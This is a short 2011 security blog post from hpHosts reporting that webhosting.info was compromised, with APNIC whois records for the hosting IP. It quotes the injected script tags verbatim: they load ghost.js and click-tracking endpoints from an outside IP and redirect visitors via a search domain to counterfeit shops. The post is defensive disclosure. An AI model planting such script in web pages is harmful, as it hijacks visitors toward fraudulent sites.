Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 1 November 2011

webhosting.info compromised

Look at the image on the left. See anything that shouldn't be there?

I'll give you a hint - it's got a black background.

I identified this whilst doing a routine enquiry on an IP housing a plethora of fake meds sites. I dropped a note to the sites owner and registrar, who informed me it most definitely should NOT be there.

The content in question, is;

<script type="text/javascript" src="http://122.182.1.154/ghost/ghost.js"></script>
<script>
infoServer="http://122.182.1.154/ghost/infoServer.php";
ghostServer="http://122.182.1.154/ghost/click.php";
initGhost() ;
</script>


The IP (122.182.1.154) belongs to Airtel customer, TELEMEDIA SERVICES;

inetnum: 122.182.0.0 - 122.182.127.255
netname: TELEMEDIA-SMB-MUM
descr: BHARTI Airtel Ltd. TELEMEDIA SERVICES
descr: 6th Floor, Interface, Bldg No 7,
descr: Link Road,Malad (W),
descr: Mumbai,Maharashtra
descr: India
descr: Contact Person: Manas Kaul
descr: Email: dsl.nocmumbai@airtel.in
descr: Phone:022-40034191
descr: Date of allocation:22-Dec-08
admin-c: MUM1-AP
tech-c: MUM1-AP
country: IN
mnt-by: MAINT-IN-BBIL
mnt-lower: MAINT-IN-TELEMEDIA
mnt-routes: MAINT-IN-TELEMEDIA
status: ALLOCATED NON-PORTABLE
changed: dsl.nocmumbai@airtel.in 20081229
source: APNIC

route: 122.182.1.0/24
descr: TELEMEDIA-SMB-MUM
descr: BHARTI Airtel Ltd. TELEMEDIA SERVICES
descr: 6th Floor, Interface, Bldg No 7,
descr: Link Road,Malad (W),
descr: Mumbai,Maharashtra
descr: INDIA
country: IN
origin: AS24560
mnt-by: MAINT-IN-TELEMEDIA
changed: dsl.nocmumbai@airtel.in 20090331
source: APNIC

route: 122.182.1.0/24
descr: TELEMEDIA-SMB-MUM
descr: BHARTI Airtel Ltd. TELEMEDIA SERVICES
descr: 6th Floor, Interface, Bldg No 7,
descr: Link Road,Malad (W),
descr: Mumbai,Maharashtra
descr: INDIA
country: IN
origin: AS45514
mnt-by: MAINT-IN-TELEMEDIA
changed: dsl.nocmumbai@airtel.in 20081229
source: APNIC

person: Network Administrator for ABTS MUM
address: ABTS
address: 6th Floor, Interface, Bldg No 7, Link Road,Malad (W),
address: Mumbai,Maharashtra
country: IN
phone: +91-9967667198
e-mail: manas.kaul@airtel.in
nic-hdl: MUM1-AP
remarks: -----------------------------
remarks: Send abuse reports to
remarks: manas.kaul@airtel.in
remarks: -----------------------------
mnt-by: MAINT-IN-TELEMEDIA
changed: manas.kaul@airtel.in 20080725
source: APNIC


The script itself, loads content that leads to search.keywordblocks.com (aka searchwe.com), which then leads unsuspecting victims to counterfeit sites such as jewelly.co.uk.

The webhosting.info server admin has been notified by the registrar, so it should be cleaned up and secured shortly.

No comments: